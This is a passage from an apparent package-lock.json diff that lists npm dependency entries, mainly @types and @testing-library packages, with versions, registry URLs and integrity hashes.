"https://registry.npmjs.org/@testing-library/react-hooks/-/react-hooks-8.0.1.tgz", + "integrity": "sha512-Aqhl2IVmLt8IovEVarNDFuJDVWVvhnr9/GCU6UUnrYXwgDFF9h2L2o2P9KBni1AST5sT6riAyoukFLyjQUgD/g==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.12.5", + "react-error-boundary": "^3.1.0" + }, + "engines": { + "node": ">=12" + }, + "peerDependencies": { + "@types/react": "^16.9.0 || ^17.0.0", + "react": "^16.9.0 || ^17.0.0", + "react-dom": "^16.9.0 || ^17.0.0", + "react-test-renderer": "^16.9.0 || ^17.0.0" + }, + "peerDependenciesMeta": { + "@types/react": { + "optional": true + }, + "react-dom": { + "optional": true + }, + "react-test-renderer": { + "optional": true + } + } + }, + "node_modules/@testing-library/react-hooks/node_modules/react-error-boundary": { + "version": "3.1.4", + "resolved": "https://registry.npmjs.org/react-error-boundary/-/react-error-boundary-3.1.4.tgz", + "integrity": "sha512-uM9uPzZJTF6wRQORmSrvOIgt4lJ9MC1sNgEOj2XGsDTRE4kmpWxg7ENK9EWNKJRMAOY9z0MuF4yIfl6gp4sotA==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.12.5" + }, + "engines": { + "node": ">=10", + "npm": ">=6" + }, + "peerDependencies": { + "react": ">=16.13.1" + } + }, + "node_modules/@testing-library/user-event": { + "version": "14.5.2", + "resolved": "https://registry.npmjs.org/@testing-library/user-event/-/user-event-14.5.2.tgz", + "integrity": "sha512-YAh82Wh4TIrxYLmfGcixwD18oIjyC1pFQC2Y01F2lzV2HTMiYrI0nze0FD0ocB//CKS/7jIUgae+adPqxK5yCQ==", + "dev": true, + "engines": { + "node": ">=12", + "npm": ">=6" + }, + "peerDependencies": { + "@testing-library/dom": ">=7.21.4" + } + }, + "node_modules/@tootallnate/once": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/@tootallnate/once/-/once-2.0.0.tgz", + "integrity": "sha512-XCuKFP5PS55gnMVu3dty8KPatLqUoy/ZYzDzAGCQ8JNFCkLXzmI7vNHCR+XpbZaMWQK/vQubr7PkYq8g470J/A==", + "engines": { + "node": ">= 10" + } + }, + "node_modules/@transloadit/prettier-bytes": { + "version": "0.0.7", + "resolved": "https://registry.npmjs.org/@transloadit/prettier-bytes/-/prettier-bytes-0.0.7.tgz", + "integrity": "sha512-VeJbUb0wEKbcwaSlj5n+LscBl9IPgLPkHVGBkh00cztv6X4L/TJXK58LzFuBKX7/GAfiGhIwH67YTLTlzvIzBA==", + "dev": true + }, + "node_modules/@trysound/sax": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/@trysound/sax/-/sax-0.2.0.tgz", + "integrity": "sha512-L7z9BgrNEcYyUYtF+HaEfiS5ebkh9jXqbszz7pC0hRBPaatV0XjSD3+eHrpqFemQfgwiFF0QPIarnIihIDn7OA==", + "dev": true, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/@types/accepts": { + "version": "1.3.5", + "resolved": "https://registry.npmjs.org/@types/accepts/-/accepts-1.3.5.tgz", + "integrity": 
"sha512-jOdnI/3qTpHABjM5cx1Hc0sKsPoYCp+DP/GJRGtDlPd7fiV9oXGGIcjW/ZOxLIvjGz8MA+uMZI9metHlgqbgwQ==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/adm-zip": { + "version": "0.5.7", + "resolved": "https://registry.npmjs.org/@types/adm-zip/-/adm-zip-0.5.7.tgz", + "integrity": "sha512-DNEs/QvmyRLurdQPChqq0Md4zGvPwHerAJYWk9l2jCbD1VPpnzRJorOdiq4zsw09NFbYnhfsoEhWtxIzXpn2yw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/aria-query": { + "version": "4.2.2", + "resolved": "https://registry.npmjs.org/@types/aria-query/-/aria-query-4.2.2.tgz", + "integrity": "sha512-HnYpAE1Y6kRyKM/XkEuiRQhTHvkzMBurTHnpFLYLBGPIylZNPs9jJcuOOYWxPLJCSEtmZT0Y8rHDokKN7rRTig==", + "dev": true + }, + "node_modules/@types/aws-lambda": { + "version": "8.10.119", + "resolved": "https://registry.npmjs.org/@types/aws-lambda/-/aws-lambda-8.10.119.tgz", + "integrity": "sha512-Vqm22aZrCvCd6I5g1SvpW151jfqwTzEZ7XJ3yZ6xaZG31nUEOEyzzVImjRcsN8Wi/QyPxId/x8GTtgIbsy8kEw==" + }, + "node_modules/@types/babel__core": { + "version": "7.20.5", + "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", + "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/parser": "^7.20.7", + "@babel/types": "^7.20.7", + "@types/babel__generator": "*", + "@types/babel__template": "*", + "@types/babel__traverse": "*" + } + }, + "node_modules/@types/babel__generator": { + "version": "7.6.8", + "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", + "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/types": "^7.0.0" + } + }, + "node_modules/@types/babel__template": { + "version": "7.4.4", + "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", + "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/parser": "^7.1.0", + "@babel/types": "^7.0.0" + } + }, + "node_modules/@types/babel__traverse": { + "version": "7.20.6", + "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", + "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/types": "^7.20.7" + } + }, + "node_modules/@types/body-parser": { + "version": "1.19.2", + "resolved": "https://registry.npmjs.org/@types/body-parser/-/body-parser-1.19.2.tgz", + "integrity": "sha512-ALYone6pm6QmwZoAgeyNksccT9Q4AWZQ6PvfwR37GT6r6FWUPguq6sUmNGSMV2Wr761oQoBxwGGa6DR5o1DC9g==", + "dependencies": { + "@types/connect": "*", + "@types/node": "*" + } + }, + "node_modules/@types/bonjour": { + "version": "3.5.13", + "resolved": "https://registry.npmjs.org/@types/bonjour/-/bonjour-3.5.13.tgz", + "integrity": "sha512-z9fJ5Im06zvUL548KvYNecEVlA7cVDkGUi6kZusb04mpyEFKCIZJvloCcmpmLaIahDpOQGHaHmG6imtPMmPXGQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/bootstrap": { + "version": "5.2.10", + "resolved": "https://registry.npmjs.org/@types/bootstrap/-/bootstrap-5.2.10.tgz", + "integrity": 
"sha512-F2X+cd6551tep0MvVZ6nM8v7XgGN/twpdNDjqS1TUM7YFNEtQYWk+dKAnH+T1gr6QgCoGMPl487xw/9hXooa2g==", + "dev": true, + "dependencies": { + "@popperjs/core": "^2.9.2" + } + }, + "node_modules/@types/bootstrap-5": { + "name": "@types/bootstrap", + "version": "5.2.10", + "resolved": "https://registry.npmjs.org/@types/bootstrap/-/bootstrap-5.2.10.tgz", + "integrity": "sha512-F2X+cd6551tep0MvVZ6nM8v7XgGN/twpdNDjqS1TUM7YFNEtQYWk+dKAnH+T1gr6QgCoGMPl487xw/9hXooa2g==", + "dev": true, + "dependencies": { + "@popperjs/core": "^2.9.2" + } + }, + "node_modules/@types/bunyan": { + "version": "1.8.8", + "resolved": "https://registry.npmjs.org/@types/bunyan/-/bunyan-1.8.8.tgz", + "integrity": "sha512-Cblq+Yydg3u+sGiz2mjHjC5MPmdjY+No4qvHrF+BUhblsmSfMvsHLbOG62tPbonsqBj6sbWv1LHcsoe5Jw+/Ow==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/caseless": { + "version": "0.12.5", + "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.5.tgz", + "integrity": "sha512-hWtVTC2q7hc7xZ/RLbxapMvDMgUnDvKvMOpKal4DrMyfGBUfB1oKaZlIRr6mJL+If3bAP6sV/QneGzF6tJjZDg==" + }, + "node_modules/@types/chai": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/@types/chai/-/chai-4.3.0.tgz", + "integrity": "sha512-/ceqdqeRraGolFTcfoXNiqjyQhZzbINDngeoAq9GoHa8PPK1yNzTaxWjA6BFWp5Ua9JpXEMSS4s5i9tS0hOJtw==" + }, + "node_modules/@types/chai-as-promised": { + "version": "7.1.8", + "resolved": "https://registry.npmjs.org/@types/chai-as-promised/-/chai-as-promised-7.1.8.tgz", + "integrity": "sha512-ThlRVIJhr69FLlh6IctTXFkmhtP3NpMZ2QGq69StYLyKZFp/HOp1VdKZj7RvfNWYYcJ1xlbLGLLWj1UvP5u/Gw==", + "dependencies": { + "@types/chai": "*" + } + }, + "node_modules/@types/check-types": { + "version": "7.3.7", + "resolved": "https://registry.npmjs.org/@types/check-types/-/check-types-7.3.7.tgz", + "integrity": "sha512-ZNAGaVc/joAV3lAuRwPdsQY/caU1RvKoa+U7i/TkYIlOStdYq4vyArFnA1zItfEDkHpXNWApWIqqbp5fsHAiRg==", + "dev": true + }, + "node_modules/@types/connect": { + "version": "3.4.35", + "resolved": "https://registry.npmjs.org/@types/connect/-/connect-3.4.35.tgz", + "integrity": "sha512-cdeYyv4KWoEgpBISTxWvqYsVy444DOqehiF3fM3ne10AmJ62RSyNkUnxMJXHQWRQQX2eR94m5y1IZyDwBjV9FQ==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/connect-history-api-fallback": { + "version": "1.5.4", + "resolved": "https://registry.npmjs.org/@types/connect-history-api-fallback/-/connect-history-api-fallback-1.5.4.tgz", + "integrity": "sha512-n6Cr2xS1h4uAulPRdlw6Jl6s1oG8KrVilPN2yUITEs+K48EzMJJ3W1xy8K5eWuFvjp3R74AOIGSmp2UfBJ8HFw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/express-serve-static-core": "*", + "@types/node": "*" + } + }, + "node_modules/@types/console-log-level": { + "version": "1.4.3", + "resolved": "https://registry.npmjs.org/@types/console-log-level/-/console-log-level-1.4.3.tgz", + "integrity": "sha512-B6Mzad6H4RugduMX84ehFVvGM/JRAd9lZQk4a6dztB4+zcIUehIjKrbWH/nHO2+0wwx05rgyqjXBvOjAv0uL6A==" + }, + "node_modules/@types/content-disposition": { + "version": "0.5.5", + "resolved": "https://registry.npmjs.org/@types/content-disposition/-/content-disposition-0.5.5.tgz", + "integrity": "sha512-v6LCdKfK6BwcqMo+wYW05rLS12S0ZO0Fl4w1h4aaZMD7bqT3gVUns6FvLJKGZHQmYn3SX55JWGpziwJRwVgutA==" + }, + "node_modules/@types/cookie": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/@types/cookie/-/cookie-0.6.0.tgz", + "integrity": "sha512-4Kh9a6B2bQciAhf7FSuMRRkUWecJgJu9nPnx3yzpsfXX/c50REIqpHY4C82bXP90qrLtXtkDxTZosYO3UpOwlA==" + }, + "node_modules/@types/cookiejar": { + 
"version": "2.1.2", + "resolved": "https://registry.npmjs.org/@types/cookiejar/-/cookiejar-2.1.2.tgz", + "integrity": "sha512-t73xJJrvdTjXrn4jLS9VSGRbz0nUY3cl2DMGDU48lKl+HR9dbbjW2A9r3g40VA++mQpy6uuHg33gy7du2BKpog==", + "dev": true + }, + "node_modules/@types/cookies": { + "version": "0.7.7", + "resolved": "https://registry.npmjs.org/@types/cookies/-/cookies-0.7.7.tgz", + "integrity": "sha512-h7BcvPUogWbKCzBR2lY4oqaZbO3jXZksexYJVFvkrFeLgbZjQkU4x8pRq6eg2MHXQhY0McQdqmmsxRWlVAHooA==", + "dependencies": { + "@types/connect": "*", + "@types/express": "*", + "@types/keygrip": "*", + "@types/node": "*" + } + }, + "node_modules/@types/cross-spawn": { + "version": "6.0.6", + "resolved": "https://registry.npmjs.org/@types/cross-spawn/-/cross-spawn-6.0.6.tgz", + "integrity": "sha512-fXRhhUkG4H3TQk5dBhQ7m/JDdSNHKwR2BBia62lhwEIq9xGiQKLxd6LymNhn47SjXhsUEPmxi+PKw2OkW4LLjA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/dateformat": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/@types/dateformat/-/dateformat-5.0.2.tgz", + "integrity": "sha512-M95hNBMa/hnwErH+a+VOD/sYgTmo15OTYTM2Hr52/e0OdOuY+Crag+kd3/ioZrhg0WGbl9Sm3hR7UU+MH6rfOw==", + "dev": true + }, + "node_modules/@types/debug": { + "version": "4.1.7", + "resolved": "https://registry.npmjs.org/@types/debug/-/debug-4.1.7.tgz", + "integrity": "sha512-9AonUzyTjXXhEOa0DnqpzZi6VHlqKMswga9EXjpXnnqxwLtdvPPtlO8evrI5D9S6asFRCQ6v+wpiUKbw+vKqyg==", + "dependencies": { + "@types/ms": "*" + } + }, + "node_modules/@types/diff": { + "version": "5.0.9", + "resolved": "https://registry.npmjs.org/@types/diff/-/diff-5.0.9.tgz", + "integrity": "sha512-RWVEhh/zGXpAVF/ZChwNnv7r4rvqzJ7lYNSmZSVTxjV0PBLf6Qu7RNg+SUtkpzxmiNkjCx0Xn2tPp7FIkshJwQ==", + "dev": true + }, + "node_modules/@types/doctrine": { + "version": "0.0.9", + "resolved": "https://registry.npmjs.org/@types/doctrine/-/doctrine-0.0.9.tgz", + "integrity": "sha512-eOIHzCUSH7SMfonMG1LsC2f8vxBFtho6NGBznK41R84YzPuvSBzrhEps33IsQiOW9+VL6NQ9DbjQJznk/S4uRA==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/eslint": { + "version": "9.6.1", + "resolved": "https://registry.npmjs.org/@types/eslint/-/eslint-9.6.1.tgz", + "integrity": "sha512-FXx2pKgId/WyYo2jXw63kk7/+TY7u7AziEJxJAnSFzHlqTAS3Ync6SvgYAN/k4/PQpnnVuzoMuVnByKK2qp0ag==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/estree": "*", + "@types/json-schema": "*" + } + }, + "node_modules/@types/eslint-scope": { + "version": "3.7.7", + "resolved": "https://registry.npmjs.org/@types/eslint-scope/-/eslint-scope-3.7.7.tgz", + "integrity": "sha512-MzMFlSLBqNF2gcHWO0G1vP/YQyfvrxZ0bF+u7mzUdZ1/xK4A4sru+nraZz5i3iEIk1l1uyicaDVTB4QbbEkAYg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/eslint": "*", + "@types/estree": "*" + } + }, + "node_modules/@types/estree": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/@types/estree/-/estree-1.0.6.tgz", + "integrity": "sha512-AYnb1nQyY49te+VRAVgmzfcgjYS91mY5P0TKUDCLEM+gNnA+3T6rWITXRLYCpahpqSQbN5cE+gHpnPyXjHWxcw==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/events": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@types/events/-/events-3.0.0.tgz", + "integrity": "sha512-EaObqwIvayI5a8dCzhFrjKzVwKLxjoG9T6Ppd5CEo07LRKfQ8Yokw54r5+Wq7FaBQ+yXRvQAYPrHwya1/UFt9g==", + "dev": true + }, + "node_modules/@types/express": { + "version": "4.17.17", + "resolved": "https://registry.npmjs.org/@types/express/-/express-4.17.17.tgz", + "integrity": 
"sha512-Q4FmmuLGBG58btUnfS1c1r/NQdlp3DMfGDGig8WhfpA2YRUtEkxAjkZb0yvplJGYdF1fsQ81iMDcH24sSCNC/Q==", + "dependencies": { + "@types/body-parser": "*", + "@types/express-serve-static-core": "^4.17.33", + "@types/qs": "*", + "@types/serve-static": "*" + } + }, + "node_modules/@types/express-serve-static-core": { + "version": "4.17.36", + "resolved": "https://registry.npmjs.org/@types/express-serve-static-core/-/express-serve-static-core-4.17.36.tgz", + "integrity": "sha512-zbivROJ0ZqLAtMzgzIUC4oNqDG9iF0lSsAqpOD9kbs5xcIM3dTiyuHvBc7R8MtWBp3AAWGaovJa+wzWPjLYW7Q==", + "dependencies": { + "@types/node": "*", + "@types/qs": "*", + "@types/range-parser": "*", + "@types/send": "*" + } + }, + "node_modules/@types/glob": { + "version": "8.1.0", + "resolved": "https://registry.npmjs.org/@types/glob/-/glob-8.1.0.tgz", + "integrity": "sha512-IO+MJPVhoqz+28h1qLAcBEH2+xHMK6MTyHJc7MTnnYb6wsoLR29POVGJ7LycmVXIqyy/4/2ShP5sUwTXuOwb/w==", + "dependencies": { + "@types/minimatch": "^5.1.2", + "@types/node": "*" + } + }, + "node_modules/@types/glob-to-regexp": { + "version": "0.4.4", + "resolved": "https://registry.npmjs.org/@types/glob-to-regexp/-/glob-to-regexp-0.4.4.tgz", + "integrity": "sha512-nDKoaKJYbnn1MZxUY0cA1bPmmgZbg0cTq7Rh13d0KWYNOiKbqoR+2d89SnRPszGh7ROzSwZ/GOjZ4jPbmmZ6Eg==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/hapi__catbox": { + "version": "10.2.4", + "resolved": "https://registry.npmjs.org/@types/hapi__catbox/-/hapi__catbox-10.2.4.tgz", + "integrity": "sha512-A6ivRrXD5glmnJna1UAGw87QNZRp/vdFO9U4GS+WhOMWzHnw+oTGkMvg0g6y1930CbeheGOCm7A1qHsqH7AXqg==" + }, + "node_modules/@types/hapi__hapi": { + "version": "20.0.13", + "resolved": "https://registry.npmjs.org/@types/hapi__hapi/-/hapi__hapi-20.0.13.tgz", + "integrity": "sha512-LP4IPfhIO5ZPVOrJo7H8c8Slc0WYTFAUNQX1U0LBPKyXioXhH5H2TawIgxKujIyOhbwoBbpvOsBf6o5+ToJIrQ==", + "dependencies": { + "@hapi/boom": "^9.0.0", + "@hapi/iron": "^6.0.0", + "@hapi/podium": "^4.1.3", + "@types/hapi__catbox": "*", + "@types/hapi__mimos": "*", + "@types/hapi__shot": "*", + "@types/node": "*", + "joi": "^17.3.0" + } + }, + "node_modules/@types/hapi__mimos": { + "version": "4.1.4", + "resolved": "https://registry.npmjs.org/@types/hapi__mimos/-/hapi__mimos-4.1.4.tgz", + "integrity": "sha512-i9hvJpFYTT/qzB5xKWvDYaSXrIiNqi4ephi+5Lo6+DoQdwqPXQgmVVOZR+s3MBiHoFqsCZCX9TmVWG3HczmTEQ==", + "dependencies": { + "@types/mime-db": "*" + } + }, + "node_modules/@types/hapi__shot": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/@types/hapi__shot/-/hapi__shot-4.1.2.tgz", + "integrity": "sha512-8wWgLVP1TeGqgzZtCdt+F+k15DWQvLG1Yv6ZzPfb3D5WIo5/S+GGKtJBVo2uNEcqabP5Ifc71QnJTDnTmw1axA==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/hoist-non-react-statics": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/@types/hoist-non-react-statics/-/hoist-non-react-statics-3.3.1.tgz", + "integrity": "sha512-iMIqiko6ooLrTh1joXodJK5X9xeEALT1kM5G3ZLhD3hszxBdIEd5C75U834D9mLcINgD4OyZf5uQXjkuYydWvA==", + "dependencies": { + "@types/react": "*", + "hoist-non-react-statics": "^3.3.0" + } + }, + "node_modules/@types/html-minifier-terser": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/@types/html-minifier-terser/-/html-minifier-terser-6.1.0.tgz", + "integrity": "sha512-oh/6byDPnL1zeNXFrDXFLyZjkr1MsBG667IM792caf1L2UPOOMf65NFzjUH/ltyfwjAGfs1rsX1eftK0jC/KIg==", + "dev": true + }, + "node_modules/@types/http-assert": { + "version": "1.5.3", + "resolved": 
"https://registry.npmjs.org/@types/http-assert/-/http-assert-1.5.3.tgz", + "integrity": "sha512-FyAOrDuQmBi8/or3ns4rwPno7/9tJTijVW6aQQjK02+kOQ8zmoNg2XJtAuQhvQcy1ASJq38wirX5//9J1EqoUA==" + }, + "node_modules/@types/http-errors": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@types/http-errors/-/http-errors-2.0.1.tgz", + "integrity": "sha512-/K3ds8TRAfBvi5vfjuz8y6+GiAYBZ0x4tXv1Av6CWBWn0IlADc+ZX9pMq7oU0fNQPnBwIZl3rmeLp6SBApbxSQ==" + }, + "node_modules/@types/http-proxy": { + "version": "1.17.16", + "resolved": "https://registry.npmjs.org/@types/http-proxy/-/http-proxy-1.17.16.tgz", + "integrity": "sha512-sdWoUajOB1cd0A8cRRQ1cfyWNbmFKLAqBB89Y8x5iYyG/mkJHc0YUH8pdWBy2omi9qtCpiIgGjuwO0dQST2l5w==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/ioredis4": { + "name": "@types/ioredis", + "version": "4.28.10", + "resolved": "https://registry.npmjs.org/@types/ioredis/-/ioredis-4.28.10.tgz", + "integrity": "sha512-69LyhUgrXdgcNDv7ogs1qXZomnfOEnSmrmMFqKgt1XMJxmoOSG/u3wYy13yACIfKuMJ8IhKgHafDO3sx19zVQQ==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/istanbul-lib-coverage": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", + "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", + "dev": true + }, + "node_modules/@types/istanbul-lib-report": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", + "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", + "dev": true, + "dependencies": { + "@types/istanbul-lib-coverage": "*" + } + }, + "node_modules/@types/istanbul-reports": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", + "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", + "dev": true, + "dependencies": { + "@types/istanbul-lib-report": "*" + } + }, + "node_modules/@types/json-schema": { + "version": "7.0.13", + "resolved": "https://registry.npmjs.org/@types/json-schema/-/json-schema-7.0.13.tgz", + "integrity": "sha512-RbSSoHliUbnXj3ny0CNFOoxrIDV6SUGyStHsvDqosw6CkdPV8TtWGlfecuK4ToyMEAql6pzNxgCFKanovUzlgQ==" + }, + "node_modules/@types/json5": { + "version": "0.0.29", + "resolved": "https://registry.npmjs.org/@types/json5/-/json5-0.0.29.tgz", + "integrity": "sha512-dRLjCWHYg4oaA77cxO64oO+7JwCwnIzkZPdrrC71jQmQtlhM556pwKo5bUzqvZndkVbeFLIIi+9TC40JNF5hNQ==", + "dev": true + }, + "node_modules/@types/keygrip": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@types/keygrip/-/keygrip-1.0.2.tgz", + "integrity": "sha512-GJhpTepz2udxGexqos8wgaBx4I/zWIDPh/KOGEwAqtuGDkOUJu5eFvwmdBX4AmB8Odsr+9pHCQqiAqDL/yKMKw==" + }, + "node_modules/@types/koa": { + "version": "2.13.8", + "resolved": "https://registry.npmjs.org/@types/koa/-/koa-2.13.8.tgz", + "integrity": "sha512-Ugmxmgk/yPRW3ptBTh9VjOLwsKWJuGbymo1uGX0qdaqqL18uJiiG1ZoV0rxCOYSaDGhvEp5Ece02Amx0iwaxQQ==", + "dependencies": { + "@types/accepts": "*", + "@types/content-disposition": "*", + "@types/cookies": "*", + "@types/http-assert": "*", + "@types/http-errors": "*", + "@types/keygrip": "*", + "@types/koa-compose": "*", + "@types/node": "*" + } + }, + "node_modules/@types/koa__router": { + "version": "8.0.11", + "resolved": 
"https://registry.npmjs.org/@types/koa__router/-/koa__router-8.0.11.tgz", + "integrity": "sha512-WXgKWpBsbS14kzmzD9LeFapOIa678h7zvUHxDwXwSx4ETKXhXLVUAToX6jZ/U7EihM7qwyD9W/BZvB0MRu7MTQ==", + "dependencies": { + "@types/koa": "*" + } + }, + "node_modules/@types/koa-compose": { + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/@types/koa-compose/-/koa-compose-3.2.5.tgz", + "integrity": "sha512-B8nG/OoE1ORZqCkBVsup/AKcvjdgoHnfi4pZMn5UwAPCbhk/96xyv284eBYW8JlQbQ7zDmnpFr68I/40mFoIBQ==", + "dependencies": { + "@types/koa": "*" + } + }, + "node_modules/@types/ldapjs": { + "version": "1.0.11", + "resolved": "https://registry.npmjs.org/@types/ldapjs/-/ldapjs-1.0.11.tgz", + "integrity": "sha512-O4D1frY6xy2mQr5WouNPeltMe5EHdmU4FxbLDC6TMDX5HXOuafusGu+7Y9WAoqBaYHZ5hcFa7jfkpggyexfeXQ==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/linkify-it": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/@types/linkify-it/-/linkify-it-5.0.0.tgz", + "integrity": "sha512-sVDA58zAw4eWAffKOaQH5/5j3XeayukzDk+ewSsnv3p4yJEZHCCzMDiZM8e0OUrRvmpGZ85jf4yDHkHsgBNr9Q==" + }, + "node_modules/@types/lodash": { + "version": "4.14.178", + "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.178.tgz", + "integrity": "sha512-0d5Wd09ItQWH1qFbEyQ7oTQ3GZrMfth5JkbN3EvTKLXcHLRDSXeLnlvlOn0wvxVIwK5o2M8JzP/OWz7T3NRsbw==", + "dev": true + }, + "node_modules/@types/long": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/@types/long/-/long-4.0.1.tgz", + "integrity": "sha512-5tXH6Bx/kNGd3MgffdmP4dy2Z+G4eaXw0SE81Tq3BNadtnMR5/ySMzX4SLEzHJzSmPNn4HIdpQsBvXMUykr58w==" + }, + "node_modules/@types/markdown-it": { + "version": "14.1.1", + "resolved": "https://registry.npmjs.org/@types/markdown-it/-/markdown-it-14.1.1.tgz", + "integrity": "sha512-4NpsnpYl2Gt1ljyBGrKMxFYAYvpqbnnkgP/i/g+NLpjEUa3obn1XJCur9YbEXKDAkaXqsR1LbDnGEJ0MmKFxfg==", + "dependencies": { + "@types/linkify-it": "^5", + "@types/mdurl": "^2" + } + }, + "node_modules/@types/mdurl": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/@types/mdurl/-/mdurl-2.0.0.tgz", + "integrity": "sha512-RGdgjQUZba5p6QEFAVx2OGb8rQDL/cPRG7GiedRzMcJ1tYnUANBncjbSB1NRGwbvjcPeikRABz2nshyPk1bhWg==" + }, + "node_modules/@types/mdx": { + "version": "2.0.13", + "resolved": "https://registry.npmjs.org/@types/mdx/-/mdx-2.0.13.tgz", + "integrity": "sha512-+OWZQfAYyio6YkJb3HLxDrvnx6SWWDbC0zVPfBRzUk0/nqoDyf6dNxQi3eArPe8rJ473nobTMQ/8Zk+LxJ+Yuw==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/memcached": { + "version": "2.2.7", + "resolved": "https://registry.npmjs.org/@types/memcached/-/memcached-2.2.7.tgz", + "integrity": "sha512-ImJbz1i8pl+OnyhYdIDnHe8jAuM8TOwM/7VsciqhYX3IL0jPPUToAtVxklfcWFGYckahEYZxhd9FS0z3MM1dpA==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/mime": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/@types/mime/-/mime-1.3.2.tgz", + "integrity": "sha512-YATxVxgRqNH6nHEIsvg6k2Boc1JHI9ZbH5iWFFv/MTkchz3b1ieGDa5T0a9RznNdI0KhVbdbWSN+KWWrQZRxTw==" + }, + "node_modules/@types/mime-db": { + "version": "1.43.1", + "resolved": "https://registry.npmjs.org/@types/mime-db/-/mime-db-1.43.1.tgz", + "integrity": "sha512-kGZJY+R+WnR5Rk+RPHUMERtb2qBRViIHCBdtUrY+NmwuGb8pQdfTqQiCKPrxpdoycl8KWm2DLdkpoSdt479XoQ==" + }, + "node_modules/@types/minimatch": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/@types/minimatch/-/minimatch-5.1.2.tgz", + "integrity": 
